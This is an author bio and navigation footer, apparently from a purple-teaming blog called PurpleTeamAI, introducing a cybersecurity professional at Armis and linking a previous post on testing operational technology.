Hugh McGauran has 25 years of experience in cybersecurity and is Country Manager for Ireland at Armis. PurpleTeamAI explores practical purple team methodology for practitioners who need results, not frameworks.

Previous
← Purple Teaming OT: Why 'We Can't Test That' Is No Longer Acceptable